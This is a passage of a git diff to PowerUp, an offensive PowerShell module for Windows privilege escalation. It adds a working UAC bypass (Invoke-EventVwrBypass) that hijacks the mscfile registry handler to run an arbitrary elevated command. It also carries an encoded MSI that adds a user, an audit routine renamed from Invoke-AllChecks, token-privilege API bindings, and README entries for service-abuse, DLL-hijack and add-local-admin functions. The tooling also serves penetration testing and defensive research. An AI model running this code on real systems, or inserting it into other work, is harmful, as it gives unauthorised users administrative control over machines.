HVyZVN0YXRlc1Byb2Nlc3NDb21wb25lbnRzVW5wdWJsaXNoRmVhdHVyZXNSZW1vdmVSZWdpc3RyeVZhbHVlc1dyaXRlUmVnaXN0cnlWYWx1ZXNSZWdpc3RlclVzZXJSZWdpc3RlclByb2R1Y3RSZW1vdmVFeGlzdGluZ1Byb2R1Y3RzTk9UIFJFTU9WRSB+PSJBTEwiIEFORCBOT1QgVVBHUkFERVBST0RVQ1RDT0RFUkVNT1ZFIH49ICJBTEwiIEFORCBOT1QgVVBHUkFESU5HUFJPRFVDVENPREVOT1QgV0lYX0RPV05HUkFERV9ERVRFQ1RFRERvd25ncmFkZXMgYXJlIG5vdCBhbGxvd2VkLkFMTFVTRVJTMUFSUE5PUkVQQUlSQVJQTk9NT0RJRllBUlBQUk9EVUNUSUNPTkFSUEhFTFBMSU5LaHR0cDovL3d3dy5leGVtc2kuY29tQVJQVVJMSU5GT0FCT1VUQVJQQ09NTUVOVFNNU0kgVGVtcGxhdGUuQVJQQ09OVEFDVE15IGNvbnRhY3QgaW5mb3JtYXRpb24uQVJQVVJMVVBEQVRFSU5GT015IHVwZGF0ZSBpbmZvcm1hdGlvbi5CWi5WRVJGQlouV1JBUFBFRF9BUFBJRHs1NjYyODkxMi04RUQ0LTQ4RUYtQUM1Mi1FRTgzQTFCRkJGMTF9X2lzMUJaLkNPTVBBTllOQU1FRVhFTVNJLkNPTUJaLklOU1RBTExfU1VDQ0VTU19DT0RFUzBCWi5GSVhFRF9JTlNUQUxMX0FSR1VNRU5UUy9TSUxFTlQgQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5GSVhFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlOT05FX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUJBU0lDX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJRlVMTF9VTklOU1RBTExfQVJHVU1FTlRTYnouU2V0dXBTaXplMjMyOTYwTWFudWZhY3R1cmVyUHJvZHVjdENvZGV7MjcxQkJDRUQtRjM2QS00RThFLUE1NzYtOTQ1NUYwQ0EwMUE4fVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZU1TSSBXcmFwcGVyIFRlbXBsYXRlUHJvZHVjdFZlcnNpb24xLjAuMC4we0NDMDM1QzE4LTBGQzctNDcwOC04ODA2LUQ0QjA5MUU1OUFBN31TZWN1cmVDdXN0b21Qcm9wZXJ0aWVzV0lYX0RPV05HUkFERV9ERVRFQ1RFRDtXSVhfVVBHUkFERV9ERVRFQ1RFRFNPRlRXQVJFXFtCWi5DT01QQU5ZTkFNRV1cTVNJIFdyYXBwZXJcSW5zdGFsbGVkXFtCWi5XUkFQUEVEX0FQUElEXUxvZ29uVXNlcltMb2dv'
 
     try {
         [System.Convert]::FromBase64String( $Binary ) | Set-Content -Path $Path -Encoding Byte
@@ -3743,60 +4559,155 @@ function Write-UserAddMSI {
 
         $Out = New-Object PSObject
         $Out | Add-Member Noteproperty 'OutputPath' $Path
+        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UserAddMSI')
         $Out
     }
     catch {
         Write-Warning "Error while writing to location '$Path': $_"
-        $Out = New-Object PSObject
-        $Out | Add-Member Noteproperty 'OutputPath' $_
-        $Out
     }
 }
 
 
-function Invoke-AllChecks {
+function Invoke-EventVwrBypass {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Runs all functions that check for various Windows privilege escalation opportunities.
+Bypasses UAC by performing an image hijack on the .msc file extension
+Only tested on Windows 7 and Windows 10
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Author: Matt Nelson (@enigma0x3)  
+License: BSD 3-Clause  
+Required Dependencies: None
 
-    .PARAMETER HTMLReport
+.PARAMETER Command
 
-        Switch. Write a HTML version of the report to SYSTEM.username.html.
+ Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>"
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Invoke-AllChecks
+Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
 
-        Runs all escalation checks and outputs a status report for discovered issues.
+This will write out "Is Elevated: True" to C:\UACBypassTest.
+#>
 
-    .EXAMPLE
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
+    Param (
+        [Parameter(Mandatory = $True)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Command,
 
-        PS C:\> Invoke-AllChecks -HTMLReport
+        [Switch]
+        $Force
+    )
+    $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
+    $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
+
+    if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
+        "UAC is set to 'Always Notify'. This module does not bypass this setting."
+        exit
+    }
+    else{
+        #Begin Execution
+        $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
+        $Command = $pshome + '\' + $Command
+        #Add in the new registry entries to hijack the msc file
+        if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
+            New-Item $mscCommandPath -Force |
+                New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
+        }else{
+            Write-Warning "Key already exists, consider using -Force"
+            exit
+        }
+
+        if (Test-Path $mscCommandPath) {
+            Write-Verbose "Created registry entries to hijack the msc extension"
+        }else{
+            Write-Warning "Failed to create registry key, exiting"
+            exit
+        }
+
+        $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
+        #Start Event Viewer
+        if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
+            $Process = Start-Process -FilePath $EventvwrPath -PassThru
+            Write-Verbose "Started eventvwr.exe"
+        }
+
+        #Sleep 5 seconds 
+        Write-Verbose "Sleeping 5 seconds to trigger payload"
+        if (-not $PSBoundParameters['WhatIf']) {
+            Start-Sleep -Seconds 5
+        }
+
+        $mscfilePath = "HKCU:\Software\Classes\mscfile"
+
+        if (Test-Path $mscfilePath) {
+            #Remove the registry entry
+            Remove-Item $mscfilePath -Recurse -Force
+            Write-Verbose "Removed registry entries"
+        }
+
+        if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
+            Stop-Process -Id $Process.Id
+            Write-Verbose "Killed running eventvwr process"
+        }
+    }
+}
+
+
+function Invoke-PrivescAudit {
+<#
+.SYNOPSIS
 
-        Runs all escalation checks and outputs a status report to SYSTEM.username.html
-        detailing any discovered issues.
+Executes all functions that check for various Windows privilege escalation opportunities.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
+
+Executes all functions that check for various Windows privilege escalation opportunities.
+
+.PARAMETER HTMLReport
+
+Switch. Write a HTML version of the report to SYSTEM.username.html.
+
+.EXAMPLE
+
+Invoke-PrivescAudit
+
+Runs all escalation checks and outputs a status report for discovered issues.
+
+.EXAMPLE
+
+Invoke-PrivescAudit -HTMLReport
+
+Runs all escalation checks and outputs a status report to SYSTEM.username.html
+detailing any discovered issues.
+
+.OUTPUTS
+
+System.String
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('System.String')]
     [CmdletBinding()]
     Param(
         [Switch]
         $HTMLReport
     )
 
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html"
-
         $Header = "<style>"
         $Header = $Header + "BODY{background-color:peachpuff;}"
         $Header = $Header + "TABLE{border-width: 1px;border-style: solid;border-color: black;border-collapse: collapse;}"
         $Header = $Header + "TH{border-width: 1px;padding: 0px;border-style: solid;border-color: black;background-color:thistle}"
         $Header = $Header + "TD{border-width: 3px;padding: 0px;border-style: solid;border-color: black;background-color:palegoldenrod}"
         $Header = $Header + "</style>"
-
         ConvertTo-HTML -Head $Header -Body "<H1>PowerUp report for '$($Env:ComputerName).$($Env:UserName)'</H1>" | Out-File $HtmlReportFile
     }
 
@@ -3806,48 +4717,53 @@ function Invoke-AllChecks {
 
     $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
 
-    if($IsAdmin){
+    if ($IsAdmin){
         "[+] Current user already has local administrative privileges!"
 
-        if($HTMLReport) {
+        if ($HTMLReport) {
             ConvertTo-HTML -Head $Header -Body "<H2>User Has Local Admin Privileges!</H2>" | Out-File -Append $HtmlReportFile
         }
     }
     else{
         "`n`n[*] Checking if user is in a local group with administrative privileges..."
 
-        $CurrentUserSids = Get-CurrentUserTokenGroupSid | Select-Object -ExpandProperty SID
-        if($CurrentUserSids -contains 'S-1-5-32-544') {
+        $CurrentUserSids = Get-ProcessTokenGroup | Select-Object -ExpandProperty SID
+        if ($CurrentUserSids -Contains 'S-1-5-32-544') {
             "[+] User is in a local group that grants administrative privileges!"
-            "[+] Run a BypassUAC attack to elevate privileges to admin."
-
-            if($HTMLReport) {
+            "[+] Run 'Invoke-WScriptUACBypass -Command `"...`"' to elevate privileges to admin."
+            if ($HTMLReport) {
                 ConvertTo-HTML -Head $Header -Body "<H2> User In Local Group With Administrative Privileges</H2>" | Out-File -Append $HtmlReportFile
             }
         }
     }
 
+    "`n`n[*] Checking current process token permissions..."
+    $Results = Get-ProcessTokenPrivilege -Special | Where-Object {$_}
+    $Results | Format-List
+    if ($HTMLReport) {
+        $Results | ConvertTo-HTML -Head $Header -Body "<H2>Cached GPP Files</H2>" | Out-File -Append $HtmlReportFile
+    }
 
     # Service checks
 
     "`n`n[*] Checking for unquoted service paths..."
-    $Results = Get-ServiceUnquoted
+    $Results = Get-UnquotedService
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Unquoted Service Paths</H2>" | Out-File -Append $HtmlReportFile
     }
 
     "`n`n[*] Checking service executable and argument permissions..."
     $Results = Get-ModifiableServiceFile
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Service File Permissions</H2>" | Out-File -Append $HtmlReportFile
     }
 
     "`n`n[*] Checking service permissions..."
     $Results = Get-ModifiableService
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Modifiable Services</H2>" | Out-File -Append $HtmlReportFile
     }
 
@@ -3861,7 +4777,7 @@ function Invoke-AllChecks {
         $_ | Add-Member Noteproperty 'AbuseFunction' $AbuseString
         $_
     } | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>%PATH% .dll Hijacks</H2>" | Out-File -Append $HtmlReportFile
     }
 
@@ -3875,7 +4791,7 @@ function Invoke-AllChecks {
         $Results = $Out
 
         $Results | Format-List
-        if($HTMLReport) {
+        if ($HTMLReport) {
             $Results | ConvertTo-HTML -Head $Header -Body "<H2>AlwaysInstallElevated</H2>" | Out-File -Append $HtmlReportFile
         }
     }
@@ -3883,7 +4799,7 @@ function Invoke-AllChecks {
     "`n`n[*] Checking for Autologon credentials in registry..."
     $Results = Get-RegistryAutoLogon
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Registry Autologons</H2>" | Out-File -Append $HtmlReportFile
     }
 
@@ -3891,7 +4807,7 @@ function Invoke-AllChecks {
     "`n`n[*] Checking for modifidable registry autoruns and configs..."
     $Results = Get-ModifiableRegistryAutoRun
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Registry Autoruns</H2>" | Out-File -Append $HtmlReportFile
     }
 
@@ -3900,48 +4816,47 @@ function Invoke-AllChecks {
     "`n`n[*] Checking for modifiable schtask files/configs..."
     $Results = Get-ModifiableScheduledTaskFile
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Modifidable Schask Files</H2>" | Out-File -Append $HtmlReportFile
     }
 
     "`n`n[*] Checking for unattended install files..."
     $Results = Get-UnattendedInstallFile
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Unattended Install Files</H2>" | Out-File -Append $HtmlReportFile
     }
 
     "`n`n[*] Checking for encrypted web.config strings..."
     $Results = Get-Webconfig | Where-Object {$_}
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Encrypted 'web.config' String</H2>" | Out-File -Append $HtmlReportFile
     }
 
     "`n`n[*] Checking for encrypted application pool and virtual directory passwords..."
     $Results = Get-ApplicationHost | Where-Object {$_}
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Encrypted Application Pool Passwords</H2>" | Out-File -Append $HtmlReportFile
     }
 
-    "`n`n[*] Checking for plaintext passwords in McAfee SiteList.xml files...."
+    "`n`n[*] Checking for plaintext passwords in McAfee SiteList.xml files..."
     $Results = Get-SiteListPassword | Where-Object {$_}
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>McAfee's SiteList.xml's</H2>" | Out-File -Append $HtmlReportFile
     }
-    "`n"
 
-    "`n`n[*] Checking for cached Group Policy Preferences .xml files...."
+    "`n`n[*] Checking for cached Group Policy Preferences .xml files..."
     $Results = Get-CachedGPPPassword | Where-Object {$_}
     $Results | Format-List
-    if($HTMLReport) {
+    if ($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Cached GPP Files</H2>" | Out-File -Append $HtmlReportFile
     }
     "`n"
 
-    if($HTMLReport) {
+    if ($HTMLReport) {
         "[*] Report written to '$HtmlReportFile' `n"
     }
 }
@@ -3949,62 +4864,153 @@ function Invoke-AllChecks {
 
 # PSReflect signature specifications
 $Module = New-InMemoryModule -ModuleName PowerUpModule
+# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', '', Scope='Function')]
 
 $FunctionDefinitions = @(
-    (func kernel32 GetCurrentProcess ([IntPtr]) @())
-    (func advapi32 OpenProcessToken ([Bool]) @( [IntPtr], [UInt32], [IntPtr].MakeByRefType()) -SetLastError)
+    (func kernel32 GetCurrentProcess ([IntPtr]) @()),
+    (func kernel32 OpenProcess ([IntPtr]) @([UInt32], [Bool], [UInt32]) -SetLastError),
+    (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError),
+    (func advapi32 OpenProcessToken ([Bool]) @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) -SetLastError)
     (func advapi32 GetTokenInformation ([Bool]) @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32].MakeByRefType()) -SetLastError),
     (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),
+    (func advapi32 LookupPrivilegeName ([Int]) @([IntPtr], [IntPtr], [String].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
     (func advapi32 QueryServiceObjectSecurity ([Bool]) @([IntPtr], [Security.AccessControl.SecurityInfos], [Byte[]], [UInt32], [UInt32].MakeByRefType()) -SetLastError),
     (func advapi32 ChangeServiceConfig ([Bool]) @([IntPtr], [UInt32], [UInt32], [UInt32], [String], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) -SetLastError -Charset Unicode),
-    (func advapi32 CloseServiceHandle ([Bool]) @([IntPtr]) -SetLastError)
+    (func advapi32 CloseServiceHandle ([Bool]) @([IntPtr]) -SetLastError),
+    (func ntdll RtlAdjustPrivilege ([UInt32]) @([Int32], [Bool], [Bool], [Int32].MakeByRefType()))
 )
 
 # https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
 $ServiceAccessRights = psenum $Module PowerUp.ServiceAccessRights UInt32 @{
-    QueryConfig =           '0x00000001'
-    ChangeConfig =          '0x00000002'
-    QueryStatus =           '0x00000004'
-    EnumerateDependents =   '0x00000008'
-    Start =                 '0x00000010'
-    Stop =                  '0x00000020'
-    PauseContinue =         '0x00000040'
-    Interrogate =           '0x00000080'
-    UserDefinedControl =    '0x00000100'
-    Delete =                '0x00010000'
-    ReadControl =           '0x00020000'
-    WriteDac =              '0x00040000'
-    WriteOwner =            '0x00080000'
-    Synchronize =           '0x00100000'
-    AccessSystemSecurity =  '0x01000000'
-    GenericAll =            '0x10000000'
-    GenericExecute =        '0x20000000'
-    GenericWrite =          '0x40000000'
-    GenericRead =           '0x80000000'
-    AllAccess =             '0x000F01FF'
+    QueryConfig             =   '0x00000001'
+    ChangeConfig            =   '0x00000002'
+    QueryStatus             =   '0x00000004'
+    EnumerateDependents     =   '0x00000008'
+    Start                   =   '0x00000010'
+    Stop                    =   '0x00000020'
+    PauseContinue           =   '0x00000040'
+    Interrogate             =   '0x00000080'
+    UserDefinedControl      =   '0x00000100'
+    Delete                  =   '0x00010000'
+    ReadControl             =   '0x00020000'
+    WriteDac                =   '0x00040000'
+    WriteOwner              =   '0x00080000'
+    Synchronize             =   '0x00100000'
+    AccessSystemSecurity    =   '0x01000000'
+    GenericAll              =   '0x10000000'
+    GenericExecute          =   '0x20000000'
+    GenericWrite            =   '0x40000000'
+    GenericRead             =   '0x80000000'
+    AllAccess               =   '0x000F01FF'
 } -Bitfield
 
 $SidAttributes = psenum $Module PowerUp.SidAttributes UInt32 @{
-    SE_GROUP_ENABLED =              '0x00000004'
-    SE_GROUP_ENABLED_BY_DEFAULT =   '0x00000002'
-    SE_GROUP_INTEGRITY =            '0x00000020'
-    SE_GROUP_INTEGRITY_ENABLED =    '0xC0000000'
-    SE_GROUP_MANDATORY =            '0x00000001'
-    SE_GROUP_OWNER =                '0x00000008'
-    SE_GROUP_RESOURCE =             '0x20000000'
-    SE_GROUP_USE_FOR_DENY_ONLY =    '0x00000010'
+    SE_GROUP_MANDATORY              =   '0x00000001'
+    SE_GROUP_ENABLED_BY_DEFAULT     =   '0x00000002'
+    SE_GROUP_ENABLED                =   '0x00000004'
+    SE_GROUP_OWNER                  =   '0x00000008'
+    SE_GROUP_USE_FOR_DENY_ONLY      =   '0x00000010'
+    SE_GROUP_INTEGRITY              =   '0x00000020'
+    SE_GROUP_RESOURCE               =   '0x20000000'
+    SE_GROUP_INTEGRITY_ENABLED      =   '0xC0000000'
+} -Bitfield
+
+$LuidAttributes = psenum $Module PowerUp.LuidAttributes UInt32 @{
+    DISABLED                            =   '0x00000000'
+    SE_PRIVILEGE_ENABLED_BY_DEFAULT     =   '0x00000001'
+    SE_PRIVILEGE_ENABLED                =   '0x00000002'
+    SE_PRIVILEGE_REMOVED                =   '0x00000004'
+    SE_PRIVILEGE_USED_FOR_ACCESS        =   '0x80000000'
 } -Bitfield
 
+$SecurityEntity = psenum $Module PowerUp.SecurityEntity UInt32 @{
+    SeCreateTokenPrivilege              =   1
+    SeAssignPrimaryTokenPrivilege       =   2
+    SeLockMemoryPrivilege               =   3
+    SeIncreaseQuotaPrivilege            =   4
+    SeUnsolicitedInputPrivilege         =   5
+    SeMachineAccountPrivilege           =   6
+    SeTcbPrivilege                      =   7
+    SeSecurityPrivilege                 =   8
+    SeTakeOwnershipPrivilege            =   9
+    SeLoadDriverPrivilege               =   10
+    SeSystemProfilePrivilege            =   11
+    SeSystemtimePrivilege               =   12
+    SeProfileSingleProcessPrivilege     =   13
+    SeIncreaseBasePriorityPrivilege     =   14
+    SeCreatePagefilePrivilege           =   15
+    SeCreatePermanentPrivilege          =   16
+    SeBackupPrivilege                   =   17
+    SeRestorePrivilege                  =   18
+    SeShutdownPrivilege                 =   19
+    SeDebugPrivilege                    =   20
+    SeAuditPrivilege                    =   21
+    SeSystemEnvironmentPrivilege        =   22
+    SeChangeNotifyPrivilege             =   23
+    SeRemoteShutdownPrivilege           =   24
+    SeUndockPrivilege                   =   25
+    SeSyncAgentPrivilege                =   26
+    SeEnableDelegationPrivilege         =   27
+    SeManageVolumePrivilege             =   28
+    SeImpersonatePrivilege              =   29
+    SeCreateGlobalPrivilege             =   30
+    SeTrustedCredManAccessPrivilege     =   31
+    SeRelabelPrivilege                  =   32
+    SeIncreaseWorkingSetPrivilege       =   33
+    SeTimeZonePrivilege                 =   34
+    SeCreateSymbolicLinkPrivilege       =   35
+}
+
 $SID_AND_ATTRIBUTES = struct $Module PowerUp.SidAndAttributes @{
     Sid         =   field 0 IntPtr
     Attributes  =   field 1 UInt32
 }
 
+$TOKEN_TYPE_ENUM = psenum $Module PowerUp.TokenTypeEnum UInt32 @{
+    Primary         = 1
+    Impersonation   = 2
+}
+
+$TOKEN_TYPE = struct $Module PowerUp.TokenType @{
+    Type  = field 0 $TOKEN_TYPE_ENUM
+}
+
+$SECURITY_IMPERSONATION_LEVEL_ENUM = psenum $Module PowerUp.ImpersonationLevelEnum UInt32 @{
+    Anonymous         =   0
+    Identification    =   1
+    Impersonation     =   2
+    Delegation        =   3
+}
+
+$IMPERSONATION_LEVEL = struct $Module PowerUp.ImpersonationLevel @{
+    ImpersonationLevel  = field 0 $SECURITY_IMPERSONATION_LEVEL_ENUM
+}
+
 $TOKEN_GROUPS = struct $Module PowerUp.TokenGroups @{
     GroupCount  = field 0 UInt32
     Groups      = field 1 $SID_AND_ATTRIBUTES.MakeArrayType() -MarshalAs @('ByValArray', 32)
 }
 
+$LUID = struct $Module PowerUp.Luid @{
+    LowPart         =   field 0 $SecurityEntity
+    HighPart        =   field 1 Int32
+}
+
+$LUID_AND_ATTRIBUTES = struct $Module PowerUp.LuidAndAttributes @{
+    Luid         =   field 0 $LUID
+    Attributes   =   field 1 UInt32
+}
+
+$TOKEN_PRIVILEGES = struct $Module PowerUp.TokenPrivileges @{
+    PrivilegeCount  = field 0 UInt32
+    Privileges      = field 1 $LUID_AND_ATTRIBUTES.MakeArrayType() -MarshalAs @('ByValArray', 50)
+}
+
 $Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace 'PowerUp.NativeMethods'
 $Advapi32 = $Types['advapi32']
 $Kernel32 = $Types['kernel32']
+$NTDll    = $Types['ntdll']
+
+Set-Alias Get-CurrentUserTokenGroupSid Get-ProcessTokenGroup
+Set-Alias Get-UnquotedService Get-UnquotedService
+Set-Alias Invoke-AllChecks Invoke-PrivescAudit
diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1
index 867c7ec..bcd2443 100644
--- a/Privesc/Privesc.psd1
+++ b/Privesc/Privesc.psd1
@@ -10,7 +10,7 @@ ModuleVersion = '3.0.0.0'
 GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'
 
 # Author of this module
-Author = 'Will Schroeder'
+Author = 'Will Schroeder (@harmj0y)'
 
 # Copyright statement for this module
 Copyright = 'BSD 3-Clause'
@@ -23,38 +23,40 @@ PowerShellVersion = '2.0'
 
 # Functions to export from this module
 FunctionsToExport = @(
-    'Add-ServiceDacl',
-    'Find-PathDLLHijack',
-    'Find-ProcessDLLHijack',
-    'Get-ApplicationHost',
-    'Get-CachedGPPPassword',
-    'Get-CurrentUserTokenGroupSid',
     'Get-ModifiablePath',
-    'Get-ModifiableRegistryAutoRun',
-    'Get-ModifiableScheduledTaskFile',
-    'Get-ModifiableService',
+    'Get-ProcessTokenGroup',
+    'Get-ProcessTokenPrivilege',
+    'Enable-Privilege',
+    'Add-ServiceDacl',
+    'Set-ServiceBinaryPath',
+    'Test-ServiceDaclPermission',
+    'Get-UnquotedService',
     'Get-ModifiableServiceFile',
-    'Get-RegistryAlwaysInstallElevated',
-    'Get-RegistryAutoLogon',
+    'Get-ModifiableService',
     'Get-ServiceDetail',
-    'Get-ServiceUnquoted',
-    'Get-SiteListPassword',
-    'Get-System',
-    'Get-UnattendedInstallFile',
-    'Get-Webconfig',
-    'Install-ServiceBinary',
-    'Invoke-AllChecks',
     'Invoke-ServiceAbuse',
+    'Write-ServiceBinary',
+    'Install-ServiceBinary',
     'Restore-ServiceBinary',
-    'Set-ServiceBinPath',
-    'Test-ServiceDaclPermission',
+    'Find-ProcessDLLHijack',
+    'Find-PathDLLHijack',
     'Write-HijackDll',
-    'Write-ServiceBinary',
-    'Write-UserAddMSI'
+    'Get-RegistryAlwaysInstallElevated',
+    'Get-RegistryAutoLogon',
+    'Get-ModifiableRegistryAutoRun',
+    'Get-ModifiableScheduledTaskFile',
+    'Get-UnattendedInstallFile',
+    'Get-WebConfig',
+    'Get-ApplicationHost',
+    'Get-SiteListPassword',
+    'Get-CachedGPPPassword',
+    'Write-UserAddMSI',
+    'Invoke-EventVwrBypass',
+    'Invoke-PrivescAudit',
+    'Get-System'
 )
 
 # List of all files packaged with this module
 FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'
 
 }
-
diff --git a/Privesc/README.md b/Privesc/README.md
index d5b499c..ac161d8 100644
--- a/Privesc/README.md
+++ b/Privesc/README.md
@@ -27,13 +27,18 @@ Required Dependencies: None
 Optional Dependencies: None
 
 
-### Service Enumeration:
-    Get-ServiceUnquoted                 -   returns services with unquoted paths that also have a space in the name
+### Token/Privilege Enumeration/Abuse:
+    Get-ProcessTokenGroup               -   returns all SIDs that the current token context is a part of, whether they are disabled or not
+    Get-ProcessTokenPrivilege           -   returns all privileges for the current (or specified) process ID
+    Enable-Privilege                    -   enables a specific privilege for the current process
+
+### Service Enumeration/Abuse:
+    Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set
+    Get-UnquotedService                 -   returns services with unquoted paths that also have a space in the name
     Get-ModifiableServiceFile           -   returns services where the current user can write to the service binary path or its config
     Get-ModifiableService               -   returns services the current user can modify
     Get-ServiceDetail                   -   returns detailed information about a specified service
-
-### Service Abuse:
+    Set-ServiceBinaryPath               -   sets the binary path for a service to a specified value
     Invoke-ServiceAbuse                 -   modifies a vulnerable service to create a local admin or execute a custom command
     Write-ServiceBinary                 -   writes out a patched C# service binary that adds a local admin or executes a custom command
     Install-ServiceBinary               -   replaces a service binary with one that adds a local admin or executes a custom command
@@ -45,7 +50,7 @@ Optional Dependencies: None
     Write-HijackDll                     -   writes out a hijackable DLL
     
 ### Registry Checks:
-    Get-RegistryAlwaysInstallElevated   -  checks if the AlwaysInstallElevated registry key is set
+    Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set
     Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry
     Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
 
@@ -59,9 +64,6 @@ Optional Dependencies: None
 
 ### Other Helpers/Meta-Functions:
     Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify
-    Get-CurrentUserTokenGroupSid        -   returns all SIDs that the current user is a part of, whether they are disabled or not
-    Add-ServiceDacl                     -   adds a Dacl field to a service object returned by Get-Service
-    Set-ServiceBinPath                  -   sets the binary path for a service to a specified value through Win32 API methods
-    Test-ServiceDaclPermission          -   tests one or more passed services or service names against a given permission set
     Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added
-    Invoke-AllChecks                    -   runs all current escalation checks and returns a report
+    Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe
+    Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)
diff --git a/README.md b/README.md
index c348b9e..5ec6892 100644
--- a/README.md
+++ b/README.md
@@ -36,7 +36,7 @@ Compresses, Base-64 encodes, and outputs generated code to load a managed dll in
 
 Encrypts text files/scripts.
 
-#### `Remove-Comments`
+#### `Remove-Comment`
 
 Strips comments and extra whitespace from a script. 
 
@@ -132,7 +132,7 @@ Displays Windows vault credential objects including cleartext web credentials.
 
 Generates a full-memory minidump of a process.
